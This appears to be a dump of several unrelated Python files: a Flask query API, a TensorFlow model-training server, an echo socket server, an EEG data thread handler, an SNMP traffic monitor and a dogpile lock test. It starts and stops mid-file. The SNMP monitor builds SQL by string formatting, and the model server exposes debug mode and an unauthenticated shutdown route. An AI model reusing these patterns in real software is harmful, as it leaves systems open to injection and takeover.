return ("Query length exceeded the maximum limit of 250", 400)
txt_data = " ".join(txt_data.split()) # remove extra whitespaces
if (not txt_data) or len(txt_data)<2:
return ("Minimum query length is 2", 400)
productid = getProductId(data)
if not productid:
return (f'Resource not supported in search. Request data: {json.dumps(data)}', 404)
productid = productid[0]
try:
loadModel(productid)
except Exception as e:
loggerInstance.logHandledException(requestId, e)
return (json.dumps({"query_received": original_query, "query": txt_data, "data": data, "results": [], "exception": str(e)}), 404)
results = loaded_models[productid].queryDetectors(txt_data)
try:
results["luis_results"] = getLuisPredictions(txt_data, productid)
except Exception as e:
results["luis_results"] = []
results["luis_exception"] = f"LUISProviderError: {str(e)}"
results = mergeLuisResults(results)
logObject = results
logObject["productId"] = productid
logObject["modelId"] = loaded_models[productid].trainingId
res = json.dumps(logObject)
return (res, 200)
@app.route('/queryMultiple', methods=["POST"])
def queryMultipleMethod():
data = json.loads(request.data.decode('utf-8'))
requestId = data['requestId']
txts = data['texts']
if not txts:
return ("No texts provided for search", 400)
productid = getProductId(data)
if not productid:
return ('Resource data not available', 404)
productid = productid[0]
try:
loadModel(productid)
except Exception as e:
loggerInstance.logHandledException(requestId, e)
loggerInstance.logToFile(requestId, e)
return (json.dumps({"query": txts, "results": [], "exception": str(e)}), 404)
res = json.dumps([loaded_models[productid].queryDetectors(txt_data) for txt_data in txts])
return (res, 200)
@app.route('/queryUtterances', methods=["POST"])
@cross_origin()
@authProvider()
def queryUtterancesMethod():
data = json.loads(request.data.decode('utf-8'))
requestId = data['requestId']
txt_data = data['detector_description']
try:
existing_utterances = [str(x).lower() for x in json.loads(data['detector_utterances'])]
except json.decoder.JSONDecodeError:
existing_utterances = []
if not txt_data:
return ("No text provided for search", 400)
productid = getProductId(data)
if not productid:
return (f'Resource type product data not available. Request data: {json.dumps(data)}', 404)
results = {"query": txt_data, "results": []}
for product in productid:
try:
loadModel(product)
res = loaded_models[product].queryUtterances(txt_data, existing_utterances)
except Exception as e:
loggerInstance.logHandledException(requestId, e)
res = {"query": txt_data, "results": None, "exception": str(e)}
if res:
results["results"] += res["results"] if res["results"] else []
res = json.dumps(results)
return (res, 200)
@app.route('/freeModel')
@cross_origin()
@authProvider()
def freeModelMethod():
productid = str(request.args.get('productId'))
freeModel(productid)
return ('', 204)
@app.route('/refreshModel', methods=["GET"])
@cross_origin()
@authProvider()
@loggingProvider(requestIdRequired=True)
def refreshModelMethod():
productid = str(request.args.get('productId')).strip()
res = "{0} - {1}".format(productid, refreshModel(productid))
return (res, 200)
|
app.py
|
import os
import yaml
import time
import requests
import queue
import errno
import threading
import multiprocessing as mp
from flask import Flask
from flask import request, jsonify
import tensorflow as tf
import tensorflow_datasets as tfds
CLSAPP = "app:18080"
running = True
MAX_CONCURRENT = 4
app = Flask(__name__)
q = queue.Queue(maxsize=10)
MODEL_TYPE_BASE = "base"
MODEL_TYPE_PRACTICAL = "practical"
MODEL_TYPE_TRIAL = "trial"
BINARY_CLASS = "binary"
MULTI_CLASS = "multi"
LABELS_FILE = "lables"
TRAINING_EPOCHS_DEFAULT = 10
IMAGE_SIZE = 224
class DeferredDelDict(dict):
_dels = None
def __enter__(self):
self._dels = set()
def __exit__(self, type, value, traceback):
for key in self._dels:
try:
dict.__delitem__(self, key)
except KeyError:
pass
self._dels = None
def __delitem__(self, key):
if key not in self:
raise KeyError(str(key))
dict.__delitem__(self, key) if self._dels is None else self._dels.add(key)
tasks = DeferredDelDict()
class ModelRequest:
def __init__(self, model_name, model_type, params):
self.model_name = model_name
self.model_type = model_type
self.params = params
def shutdown_server():
stop = request.environ.get("werkzeug.server.shutdown")
if stop is None:
raise RuntimeError("Not running with the Werkzeug Server")
print("Shutting down...")
stop()
@app.route("/shutdown", methods=["POST"])
def shutdown():
global running
running = False
remaining_requests = q.qsize()
building_requests = len(tasks)
shutdown_server()
return jsonify(
{
"remainingRequests": remaining_requests,
"buildingRequests": building_requests,
}
)
@app.route("/models", methods=["GET"])
def get_models():
remaining_requests = q.qsize()
building_requests = len(tasks)
return jsonify(
{
"remainingRequests": remaining_requests,
"buildingRequests": building_requests,
}
)
@app.route("/models/<model_name>", methods=["POST"])
def create_model(model_name):
if model_name == "":
return error_response(400, "Invalid model name")
params = request.get_json()
s, ok = check_necessary_params(params)
if not ok:
return error_response(400, s)
image_path = params.get("imagePath", "")
trial = params.get("trial", False)
if image_path != "" or trial:
if trial:
model_type = MODEL_TYPE_TRIAL
else:
model_type = MODEL_TYPE_PRACTICAL
else:
model_type = MODEL_TYPE_BASE
req = ModelRequest(model_name, model_type, params)
try:
q.put_nowait(req)
except queue.Full:
return error_response(500, "Server currently busy")
return jsonify(
{
"model": model_name,
"type": model_type,
}
)
def check_necessary_params(params):
model_path = params.get("modelPath", "")
if model_path == "":
return "Invalid path for model", False
cfg_file = params.get("configFile", "")
if cfg_file == "":
return "Invalid config file name", False
return "", True
def get_base_model(is_tl):
if is_tl:
return tf.keras.applications.MobileNetV2(
input_shape=(IMAGE_SIZE, IMAGE_SIZE, 3),
weights="imagenet",
# fully connected layer인 분류계층은 학습을 하기위해 포함하지 않음
include_top=False,
)
else:
return tf.keras.applications.MobileNetV2(
weights="imagenet",
)
def create_base_model(model_name, params):
model = get_base_model(False)
model_path = params.get("modelPath")
if os.path.isdir(model_path):
print(f"Model path already exists: {model_path}")
return
model.save(model_path)
tmp_labels_file = f"{LABELS_FILE}.tmp"
labels_path = tf.keras.utils.get_file(
tmp_labels_file,
"https://storage.googleapis.com/download.tensorflow.org/data/ImageNetLabels.txt",
cache_subdir="",
cache_dir=model_path,
)
# https://gist.github.com/yrevar/942d3a0ac09ec9e5eb3a#gistcomment-2719675
# 불필요한 첫번째 label(`background`)를 제거
with open(os.path.join(model_path, LABELS_FILE), "w") as ofp:
with open(os.path.join(model_path, tmp_labels_file)) as ifp:
labels = ifp.readlines()
os.remove(os.path.join(model_path, tmp_labels_file))
for label in labels[1:]:
ofp.write(f"{label}")
# signature는 함수를 구분하며, 기본 함수 signature를 이용
input_name = (
f"{tf.saved_model.DEFAULT_SERVING_SIGNATURE_DEF_KEY}_{model.input_names[0]}"
)
output_name = "StatefulPartitionedCall"
desc = params.get("desc", "")
if desc == "":
desc = "Default base model"
cfg = {
"name": model_name,
"type": MODEL_TYPE_BASE,
"tags": [tf.saved_model.SERVING], # meta graph를 명시하며 "serving"을 사용
"classification": MULTI_CLASS,
"inputShape": list(model.input_shape[1:]), # ignore batch size
"inputOperationName": input_name,
"outputOperationName": output_name,
"labelsFile": LABELS_FILE,
"description": desc,
}
cfg_file = params.get("configFile")
with open(os.path.join(model_path, cfg_file), "w") as fp:
yaml.dump(cfg, fp)
response = requests.put(
f"http://{CLSAPP}/models/{model_name}", json={"modelPath": model_path}
)
print(
f"Operate {model_name}, {MODEL_TYPE_BASE}, {model_path}: ({response.status_code}) {response.text}"
)
def create_transfer_learned_model(model_name, params):
trial = params.get("trial", False)
epochs = params.get("epochs", TRAINING_EPOCHS_DEFAULT)
base_model = get_base_model(True)
if trial:
model_type = MODEL_TYPE_TRIAL
model, classification, labels, result = trial_trasnfer_learned_model(
base_model, epochs
)
else:
model_type = MODEL_TYPE_PRACTICAL
image_path = params.get("imagePath", "")
model, classification, labels, result = practical_trasnfer_learned_model(
base_model, image_path, epochs
)
model_path = params.get("modelPath")
if os.path.isdir(model_path):
print(f"Model path already exists: {model_path}")
return
model.save(model_path)
with open(os.path.join(model_path, LABELS_FILE), "w") as fp:
for label in labels:
fp.write(f"{label}\n")
# signature는 함수를 구분하며, 기본 함수 signature를 이용
input_name = (
f"{tf.saved_model.DEFAULT_SERVING_SIGNATURE_DEF_KEY}_{model.input_names[0]}"
)
output_name = "StatefulPartitionedCall"
desc = params.get("desc")
cfg = {
"name": model_name,
"type": model_type,
"tags": [tf.saved_model.SERVING], # meta graph를 명시하며 "serving"을 사용
"classification": classification,
"inputShape": list(model.input_shape[1:]), # ignore batch size
"inputOperationName": input_name,
"outputOperationName": output_name,
"labelsFile": LABELS_FILE,
"description": desc,
"trainingResult": result, # 학습결과 저장
}
cfg_file = params.get("configFile")
with open(os.path.join(model_path, cfg_file), "w") as fp:
yaml.dump(cfg, fp)
response = requests.put(
f"http://{CLSAPP}/models/{model_name}", json={"modelPath": model_path}
)
print(
f"Operate {model_name}, {MODEL_TYPE_BASE}, {model_path}: ({response.status_code}) {response.text}"
)
def practical_trasnfer_learned_model(base_model, image_path, epochs):
dirs = []
for file in os.listdir(image_path):
path = os.path.join(image_path, file)
if os.path.isdir(path):
dirs.append(path)
label_mode = "binary" if len(dirs) == 2 else "categorical"
train_ds = tf.keras.preprocessing.image_dataset_from_directory(
image_path,
label_mode=label_mode,
validation_split=0.2,
subset="training",
seed=123,
image_size=(IMAGE_SIZE, IMAGE_SIZE),
)
validation_ds = tf.keras.preprocessing.image_dataset_from_directory(
image_path,
label_mode=label_mode,
validation_split=0.2,
subset="validation",
seed=123,
image_size=(IMAGE_SIZE, IMAGE_SIZE),
)
labels = train_ds.class_names
train = train_ds.map(normalize_image)
validation = validation_ds.map(normalize_image)
model, classification = build_and_compile_model(base_model, train, len(labels))
result = train_and_evaluate_model(model, train, validation, epochs)
return model, classification, labels, result
def trial_trasnfer_learned_model(base_model, epochs):
(raw_train, raw_validation), metadata = tfds.load(
"cats_vs_dogs",
split=["train[:30%]", "train[80%:]"],
with_info=True,
as_supervised=True,
)
labels = []
get_label_name = metadata.features["label"].int2str
for i in range(metadata.features["label"].num_classes):
labels.append(get_label_name(i))
train = raw_train.map(normalize_and_resize_image)
validation = raw_validation.map(normalize_and_resize_image)
train_batches = train.shuffle(1000).batch(32)
validation_batches = validation.shuffle(1000).batch(32)
model, classification = build_and_compile_model(
base_model,
train_batches,
len(labels),
)
result = train_and_evaluate_model(model, train_batches, validation_batches, epochs)
return model, classification, labels, result
def build_and_compile_model(
base_model, train_batches, nr_classes, lr=0.0001, metrics=["accuracy"]
):
for image_batch, label_batch in train_batches.take(1):
feature_batch = base_model(image_batch)
# 이지미에서 featur를 추출하는 CNN 모델의 가중치는 조정하지 않고,
# 분류를 수행하는 fully connected layer만 학습
base_model.trainable = False
global_average_layer = tf.keras.layers.GlobalAveragePooling2D()
feature_batch_average = global_average_layer(feature_batch)
# 분류계층에 sigmoid or softmax 활성함수를 적용하기 때문에 from_logits을 False로 해야
# loss에 대한 학습이 됨 (loss 함수 내부에서는 logit 값을 사용함)
if nr_classes == 2:
classification = BINARY_CLASS
activation = "sigmoid"
units = 1
loss = tf.keras.losses.BinaryCrossentropy(from_logits=False)
else: # nr_classes > 2
classification = MULTI_CLASS
activation = "softmax"
units = nr_classes
loss = tf.keras.losses.CategoricalCrossentropy(from_logits=False)
# nr_classes에 맞춰 분류하기위한 classfication layer 추가
prediction_layer = tf.keras.layers.Dense(units, activation=activation)
prediction_batch = prediction_layer(feature_batch_average)
model = tf.keras.Sequential([base_model, global_average_layer, prediction_layer])
model.compile(
optimizer=tf.keras.optimizers.RMSprop(lr=lr),
loss=loss,
metrics=metrics,
)
return model, classification
def train_and_evaluate_model(model, train_batches, validation_batches, epochs):
loss0, acc0 = model.evaluate(validation_batches, steps=20)
history = model.fit(
train_batches, epochs=epochs, validation_data=validation_batches
)
loss = history.history["loss"]
acc = history.history["accuracy"]
val_loss = history.history["val_loss"]
val_acc = history.history["val_accuracy"]
result = {
"epochs": epochs,
"initLoss": loss0,
"initAccuracy": acc0,
"trainLoss": loss,
"trainAccuracy": acc,
"validationLoss": val_loss,
"validationAccuracy": val_acc,
}
return result
def normalize_image(image, label):
image = tf.cast(image, tf.float32)
image = (image / 127.5) - 1
return image, label
def normalize_and_resize_image(image, label):
image = tf.cast(image, tf.float32)
image = (image / 127.5) - 1
image = tf.image.resize(image, (IMAGE_SIZE, IMAGE_SIZE))
return image, label
def error_response(status, message):
response = jsonify(
{
"error": message,
}
)
response.status_code = status
return response
def overwatch_tasks(tasks, timeout=None):
with tasks:
for task in tasks:
try:
task.get(timeout)
except mp.TimeoutError:
continue
del tasks[task]
def management(nr_workers=MAX_CONCURRENT):
global tasks
with mp.Pool(processes=nr_workers) as pool:
while running:
overwatch_tasks(tasks, 1)
if len(tasks) >= MAX_CONCURRENT or q.empty():
time.sleep(1)
continue
while running and len(tasks) < MAX_CONCURRENT:
try:
req = q.get_nowait()
except queue.Empty:
break
if (
req.model_type == MODEL_TYPE_PRACTICAL
or req.model_type == MODEL_TYPE_TRIAL
):
task = pool.apply_async(
func=create_transfer_learned_model,
args=(
req.model_name,
req.params,
),
)
else:
task = pool.apply_async(
func=create_base_model,
args=(
req.model_name,
req.params,
),
)
tasks[task] = True
overwatch_tasks(tasks)
print("Exit manager")
if __name__ == "__main__":
manager = threading.Thread(target=management)
manager.start()
app.run(host="0.0.0.0", port="18090", debug=True, use_reloader=False)
manager.join()
|
server.py
|
# The MIT License (MIT)
# Copyright (c) 2019 Shubhadeep Banerjee
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
import socket
import sys
import logging
from logging.handlers import RotatingFileHandler
import threading
# define global variables
# timeout to close an idle socket, 0 means no timeout (in seconds)
SOCKET_TIMEOUT = 0
LOGGER_SIZE = 1024 * 1000 # size of individual log file (in Bytes)
LOGGER_BACKUP_COUNT = 10 # no of log backups after the current log file is full
# setup the logger
logger = logging.getLogger('EchoServerLogger')
logger.setLevel(logging.INFO)
logger.propagate = False
hdlr = RotatingFileHandler(
'server.log', maxBytes=LOGGER_SIZE, backupCount=10)
formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
def log(message):
"""global log method
"""
print(message)
logger.info(message)
class SocketServer:
HOST = ''
PORT = 0
s = None
def __init__(self, host, port):
self.HOST = host
self.PORT = port
def startServer(self):
"""starts the socket server
"""
log("Opening socket on {0}:{1}".format(self.HOST, self.PORT))
try:
s = socket.socket()
s.bind((self.HOST, self.PORT))
except socket.error as msg:
s = None
try:
s.listen(5)
log("Socket is listening on {0}:{1}, timeout {2} sec".format(
self.HOST, self.PORT, SOCKET_TIMEOUT))
except:
if s is not None:
s.close()
s = None
# if socket is not open, exit the program
if s is None:
log('Could not open socket')
sys.exit(1)
# otherwise run a while loop where we accept an incoming connection
# and hand it over to the socket handler
else:
while True:
try:
sock, addr = s.accept()
# create a handler and start the same
handler = SocketHandler(sock, addr)
handler.start()
except:
break
log('Program terminated, closing socket!')
s.close()
class SocketHandler:
def __init__(self, socket, addr):
self.socket = socket
# set the timeout if the timeout is set greater than '0'
if (SOCKET_TIMEOUT > 0):
self.socket.settimeout(SOCKET_TIMEOUT)
self.addr = addr
self.open = True
def start(self):
"""creates a thread and starts the handler
"""
t1 = threading.Thread(target=self.handle, args=[])
t1.daemon = True
t1.start()
def handle(self):
"""Handles a socket client
"""
# read the socket until the socket is open
while self.open:
try:
# read bytes from socket
data = self.socket.recv(1024)
# convert the bytes to readable string
# here we are using utf-8, but anything character set can be used
dataStr = data.decode('utf-8')
except:
self.open = False
continue
if len(dataStr) > 0:
# if we recive some data, we log and echo back the data
log('Data from {0} - {1}'.format(self.addr, dataStr))
# before sending the data we need to encode it back to bytes
self.socket.send(dataStr.encode())
elif len(data) == 0:
# if the data stream is eampty, means the socket is closed
self.socket.close()
log('Closed {0}'.format(self.addr))
if __name__ == '__main__':
# 0.0.0.0 as host ip means it will receive socket connecting from all IPs
# we can put a specific IP to whitelist the clients
server = SocketServer('0.0.0.0', 6060)
server.startServer()
|
threadhandler.py
|
from time import sleep
import read_mindwave_mobile
from threading import Thread
class data :
Delta = []
Theta = []
LowAlpha = []
HighAlpha = []
LowBeta = []
HighBeta = []
LowGamma = []
MedGamma = []
AttentionLevel = []
MeditationLevel = []
def startallfunc() :
thread1 = Thread(target = read_mindwave_mobile.start_measure)
thread2 = Thread(target= wait_until_have_enough_data)
thread1.start()
thread2.start()
def send_kill_code() :
read_mindwave_mobile.kill_signal = True
def wait_until_have_enough_data() :
i = len(read_mindwave_mobile.Delta)+len(read_mindwave_mobile.Theta)+len(read_mindwave_mobile.LowAlpha)+len(read_mindwave_mobile.HighAlpha) + len(read_mindwave_mobile.LowBeta)
i+= len(read_mindwave_mobile.HighBeta) + len(read_mindwave_mobile.MedGamma) + len(read_mindwave_mobile.AttentionLevel) + len(read_mindwave_mobile.MeditationLevel)
while read_mindwave_mobile.kill_signal != True and i >=9:
data.Delta += read_mindwave_mobile.Delta[-1]
data.Theta += read_mindwave_mobile.Theta[-1]
data.LowAlpha += read_mindwave_mobile.LowAlpha[-1]
data.HighAlpha += read_mindwave_mobile.HighAlpha[-1]
data.LowBeta += read_mindwave_mobile.LowBeta[-1]
data.HighBeta += read_mindwave_mobile.HighBeta[-1]
data.LowGamma += read_mindwave_mobile.LowGamma[-1]
data.HighBeta += read_mindwave_mobile.HighBeta[-1]
data.MedGamma += read_mindwave_mobile.MedGamma[-1]
data.AttentionLevel += read_mindwave_mobile.AttentionLevel[-1]
data.MeditationLevel += read_mindwave_mobile.MeditationLevel[-1]
def clear_data() :
data.Delta.clear()
data.Theta.clear()
data.LowAlpha.clear()
data.HighAlpha.clear()
data.LowBeta.clear()
data.HighBeta.clear()
data.LowGamma.clear()
data.MedGamma.clear()
data.AttentionLevel.clear()
data.MeditationLevel.clear()
# def analyse() :
|
interface_statistics_monitor.py
|
from common_tasks import Grab_device_interfaces_snmp, get_data, set_data_mysql, device_config_info_lookup, print_error
from SNMPPoll import SnmpPoll as snmppoll
from datetime import datetime
from int_down import process_down
from threading import Thread
from deprefer_automation import add_cost_workflow
import time
import sys
percentage_threashold = 10
interval = 5
minuets = 5
def match_db_to_device(device_interfaces, device_id):
"""
Author - Jonathan Steward
Function - Take the list of interfaces and match up to the database interface and link the database
information with the local interface
Inputs -
device_interfaces - list - list of interfaceobjects from SNMP gets
device_id -
returns -
device_interfaces - list - list of interface objects from snmp gets with database info
"""
command = "SELECT * FROM `FYP Data`.interfaces where device_id = {}".format(device_id)
# data will be ID/device_id/name/description/ip_address/state/lastupdate/traffic_counter/speed
db_interfaces = get_data(command)
for i in range(len(device_interfaces)):
for db_int in db_interfaces:
if device_interfaces[i].value == db_int[2]:
name = str(device_interfaces[i].value)
oid_index = int(device_interfaces[i].oid_index)
device_interfaces[i] = {"name": name, "oid_index": oid_index}
device_interfaces[i]["db_id"] = db_int[0]
device_interfaces[i]["previous_update"] = db_int[6]
device_interfaces[i]["previous_counter"] = db_int[7]
device_interfaces[i]["speed"] = db_int[8]
break
return device_interfaces
def print_polling_traffic_stats(device_int):
"""
Author - Jonathan Steward
Function - print out traffic stats for the interval polling of the interface
Inputs -
device_int - object - combined database and snmp gathered information
returns - n/a
"""
print "previous counter {}".format(device_int["previous_counter"])
print "current_counter {}".format(device_int["current_counter"])
print "bits_out {}".format(device_int["bits_out"])
print "time_of poll {}".format(device_int["update_time"])
print "previous_update {}".format(device_int["previous_update"])
print "secounds since {}".format(device_int["seconds_since"])
print "bits_per_sec {}".format(device_int["bits_per_sec"])
print "speed {}".format(device_int["speed"])
print "util_percentage {}".format(device_int["util_percentage"])
print "util_percentage after round {}".format(device_int["util_percentage"])
def poll_traffic(device_interfaces, device_ip, community):
"""
Author - Jonathan Steward
Function - Polls Device for interface counter and then calls traffic automation for loops
Inputs -
device_interfaces - list - list of interface objects from snmp gets with database info
device_ip - string - ip address of host with high utilization
community - string - community string needed for SNMP
returns - n/a
"""
interfaces_traffic = snmppoll("WALK", ".1.3.6.1.2.1.31.1.1.1.10", device_ip, community)
time_now = datetime.now()
print "polled interface traffic on {}".format(device_ip)
if not interfaces_traffic:
print_error("no interface traffic stats reutrned!")
return
for int_traffic in interfaces_traffic:
for i in range(len(device_interfaces)):
if int(int_traffic.oid_index) != int(device_interfaces[i]["oid_index"]):
# Not a matched interface
continue
if device_interfaces[i]["speed"] == 0:
# Will always alarm no need for this
break
device_interfaces[i]["current_counter"] = int(int_traffic.value)
state, device_interfaces[i] = calculate_interface_util(device_interfaces[i], time_now)
if not state:
break
if device_interfaces[i]["util_percentage"] > 1:
print_polling_traffic_stats(device_interfaces[i])
print "threashold is {}% current usage is {}% on {} for {} device".format(
percentage_threashold,
device_interfaces[i]["util_percentage"],
device_interfaces[i]["name"],
device_ip)
update_interface_and_history(device_interfaces[i])
if device_interfaces[i]["util_percentage"] > percentage_threashold:
print "interface {} on {} is at {}% which is above threashold".format(
device_interfaces[i]["name"],
device_ip,
device_interfaces[i]["util_percentage"])
traffic_automation(device_interfaces[i], device_ip, community)
#t = Thread(target=traffic_automation, args=(device_interfaces[i], device_ip, community,))
#t.start()
def calculate_interface_util(device_int, time_now):
"""
Author - Jonathan Steward
Function - calculate the utilization on the interface
Inputs -
device_int - object - combined database and snmp gathered information
time_now - datetime object - Time of the poll for traffic counter
returns -
bool - state of if there was an increase on the counter
device_int - object - combined database and snmp gathered information
"""
device_int["current_counter"] = int(device_int["current_counter"])
device_int["previous_counter"] = int(device_int["previous_counter"])
if device_int["current_counter"] == device_int["previous_counter"]:
# print "no traffic on interface {} on {}".format(device_int["name"], device_ip)
return False, device_int
device_int["update_time"] = time_now
device_int["seconds_since"] = (time_now - device_int["previous_update"]).seconds
device_int["bits_out"] = (device_int["current_counter"] * 8) - (device_int["previous_counter"] * 8)
max_int = 9223372036854775807
if device_int["bits_out"] < 0:
device_int["bits_out"] = (max_int - device_int["previous_counter"]) + device_int["current_counter"]
device_int["bits_per_sec"] = device_int["bits_out"] / device_int["seconds_since"]
device_int["util_percentage"] = float(device_int["bits_per_sec"]) * 100 / float(device_int["speed"])
device_int["util_percentage"] = round(device_int["util_percentage"], 3)
return True, device_int
def update_interface_and_history(device_int):
"""
Author - Jonathan Steward
Function - update the interface details on the database
Inputs -
device_int - object - combined database and snmp gathered information
returns - n/a
"""
command = """
UPDATE `FYP Data`.`interfaces`
SET `traffic_out_counter`='{}', `last_updated` = '{}'
WHERE `interface_id`='{}';""".format(
int(device_int["current_counter"]),
device_int["update_time"],
device_int["db_id"])
set_data_mysql(command)
#print "updating interface with following mysql command:\n{}".format(command)
# UPDATE HISTORY FEATURES OMMITTED AS IT WOULD NOT BE USED RIGHT NOW
def check_for_event(device_int, device_ip):
"""
Author - Jonathan Steward
Function - checks for an existing event and if one exists if its an old event or not
Inputs -
Global - timeout_minuets - defined at the top to identify how many minuets old an event
needs to be before closing it.
device_int - object - combined database and snmp gathered information
device_ip - string - ip address of the host for this event
returns -
"""
command = """
SELECT * FROM `FYP Data`.interface_events
where `interface_id` = '{}'
and `state` = 'active'
and `issue` = 'out utilization'""".format(device_int["db_id"])
events = get_data(command)
if events:
time_now = datetime.now()
time_diff = (time_now - events[0][4]).seconds
timeout_minuets = 5
if time_diff / 60 > timeout_minuets:
print_error("closing old event older than {} minuets".format(timeout_minuets))
command = """
UPDATE `FYP Data`.`interface_events`
SET `state` = 'resolved'
WHERE event_id = {} ;""".format(events[0][0])
set_data_mysql(command)
else:
print "event for {} on {} already exists will not act".format(device_int["name"], device_ip)
return False
command = """
INSERT INTO `FYP Data`.`interface_events` (`interface_id`, `state`, `issue`)
VALUES ('{}', 'active', 'out utilization');""".format(device_int["db_id"])
set_data_mysql(command)
return True
def traffic_automation(device_int, device_ip, community):
"""
Author - Jonathan Steward
Function - Checks for event, if no event, will loop calling individual traffic check
once the check has occured for the identified amount of times will trigger automation
Inputs -
GLOBAL - minuets - Number of minuets/attempts/datapoints to wait till triggering automation
device_int - object - combined database and snmp gathered information
device_ip - string - ip address of host with high utilization
community - string - community string needed for SNMP
returns - n/a
"""
state = check_for_event(device_int, device_ip)
if not state:
return
re_tries = 0
while re_tries < minuets:
state, device_int = individual_traffic_check(device_int, device_ip, community, re_tries)
update_interface_and_history(device_int)
if not state:
print "interface {} on {} didn't break the threashold on datapoint {} with {}%".format(
device_int["name"],
device_ip,
re_tries,
device_int["util_percentage"])
close_event(device_int)
return
else:
re_tries += 1
#print_error("TRIGGER AUTOMATION")
state = add_cost_workflow(device_ip, device_int["name"], 10, "automation")
close_event(device_int)
def close_event(device_int):
"""
Author - Jonathan Steward
Function - closes event that was created once automation has been triggered
Inputs -
device_int - object - combined database and snmp gathered information
returns - n/a
"""
command = """
SELECT * FROM `FYP Data`.interface_events
where interface_id = {} and state ='active' and issue = 'out utilization'""".format(device_int["db_id"])
event = get_data(command)
command = """
UPDATE `FYP Data`.`interface_events`
SET `state` = 'resolved'
WHERE event_id = {} ;""".format(event[0][0])
set_data_mysql(command)
update_interface_and_history(device_int)
def individual_traffic_check(device_int, device_ip, community, re_tries):
"""
Author - Jonathan Steward
Function - checks for one interface the current utilization, calculation of util is in
another function however
Inputs -
device_int - object - combined database and snmp gathered information
device_ip - string - ip address of host with high utilization
community - string - community string needed for SNMP
re_tries - int - number of re-tries so far
returns -
bool - state of if the util is above the threshold
object - device_int - combined database and snmp gathered information
"""
print "sleeping for some time"
time.sleep(interval)
# Sleep for 60s to then poll for a new data point
device_int["previous_counter"] = device_int["current_counter"]
int_traffic = snmppoll(
"GET",
".1.3.6.1.2.1.31.1.1.1.10.{}".format(device_int["oid_index"]),
device_ip,
community)
time_now = datetime.now()
device_int["previous_update"] = device_int["update_time"]
device_int["update_time"] = time_now
device_int["current_counter"] = int_traffic.value
state, device_int = calculate_interface_util(device_int, time_now)
if not state:
return False, device_int
print_polling_traffic_stats(device_int)
if device_int["util_percentage"] > percentage_threashold:
print "interface {} on {} is at {}% utilization this above the threashold attemp {}".format(
device_int["name"],
device_ip,
device_int["util_percentage"],
re_tries)
return True, device_int
# Flowed traffic but didn't break threashold
return False, device_int
def main():
command = "SELECT * FROM `FYP Data`.device_table;"
devices = get_data(command)
for device in devices:
(device_id, device_ip, vendor,
community, username, passwd,
enpass, config_lock, lock_reason, asn) = device
device_interfaces = Grab_device_interfaces_snmp(device_ip, community)
if not device_interfaces:
continue
device_interfaces = match_db_to_device(device_interfaces, device_id)
device_interfaces = poll_traffic(device_interfaces, device_ip, community)
if __name__ == "__main__":
main()
|
test_lock.py
|
from unittest import TestCase
import time
import threading
from dogpile import Lock, NeedRegenerationException
from dogpile.util import ReadWriteMutex
import contextlib
import math
import logging
import mock
log = logging.getLogger(__name__)
class ConcurrencyTest(TestCase):
# expiretime, time to create, num usages, time spend using, delay btw usage
_assertion_lock = threading.Lock()
def test_quick(self):
self._test_multi(
10, 2, .5, 50, .05, .1,
)
def test_slow(self):
self._test_multi(
10, 5, 2, 50, .1, .1,
)
# TODO: this is a port from the legacy test_dogpile test.
# sequence and calculations need to be revised.
# def test_get_value_plus_created_slow_write(self):
# self._test_multi(
# 10, 2, .5, 50, .05, .1,
# slow_write_time=2
# )
def test_return_while_in_progress(self):
self._test_multi(
10, 5, 2, 50, 1, .1
)
def test_get_value_plus_created_long_create(self):
self._test_multi(
10, 2, 2.5, 50, .05, .1,
)
def test_get_value_plus_created_registry_unsafe_cache(self):
self._test_multi(
10, 1, .6, 100, .05, .1,
cache_expire_time='unsafe'
)
def test_get_value_plus_created_registry_safe_cache_quick(self):
self._test_multi(
10, 2, .5, 50, .05, .1,
cache_expire_time='safe'
)
def test_get_value_plus_created_registry_safe_cache_slow(self):
self._test_multi(
10, 5, 2, 50, .1, .1,
cache_expire_time='safe'
)
def _assert_synchronized(self):
acq = self._assertion_lock.acquire(False)
assert acq, "Could not acquire"
@contextlib.contextmanager
def go():
try:
yield {}
except:
raise
finally:
self._assertion_lock.release()
return go()
def _assert_log(self, cond, msg, *args):
if cond:
log.debug(msg, *args)
else:
log.error("Assertion failed: " + msg, *args)
assert False, msg % args
def _test_multi(
self, num_threads,
expiretime,
creation_time,
num_usages,
usage_time,
delay_time,
cache_expire_time=None,
slow_write_time=None
):
mutex = threading.Lock()
if slow_write_time:
readwritelock = ReadWriteMutex()
unsafe_cache = False
if cache_expire_time:
if cache_expire_time == 'unsafe':
unsafe_cache = True
cache_expire_time = expiretime * .8
elif cache_expire_time == 'safe':
cache_expire_time = (expiretime + creation_time) * 1.1
else:
assert False, cache_expire_time
log.info("Cache expire time: %s", cache_expire_time)
effective_expiretime = min(cache_expire_time, expiretime)
else:
effective_expiretime = expiretime
effective_creation_time = creation_time
max_stale = (
effective_expiretime + effective_creation_time +
usage_time + delay_time) * 1.1
the_resource = []
slow_waiters = [0]
failures = [0]
def create_resource():
with self._assert_synchronized():
log.debug(
"creating resource, will take %f sec" % creation_time)
time.sleep(creation_time)
if slow_write_time:
readwritelock.acquire_write_lock()
try:
saved = list(the_resource)
# clear out the resource dict so that
# usage threads hitting it will
# raise
the_resource[:] = []
time.sleep(slow_write_time)
the_resource[:] = saved
finally:
readwritelock.release_write_lock()
the_resource.append(time.time())
value = the_resource[-1]
log.debug("finished creating resource")
return value, time.time()
def get_value():
if not the_resource:
raise NeedRegenerationException()
if cache_expire_time:
if time.time() - the_resource[-1] > cache_expire_time:
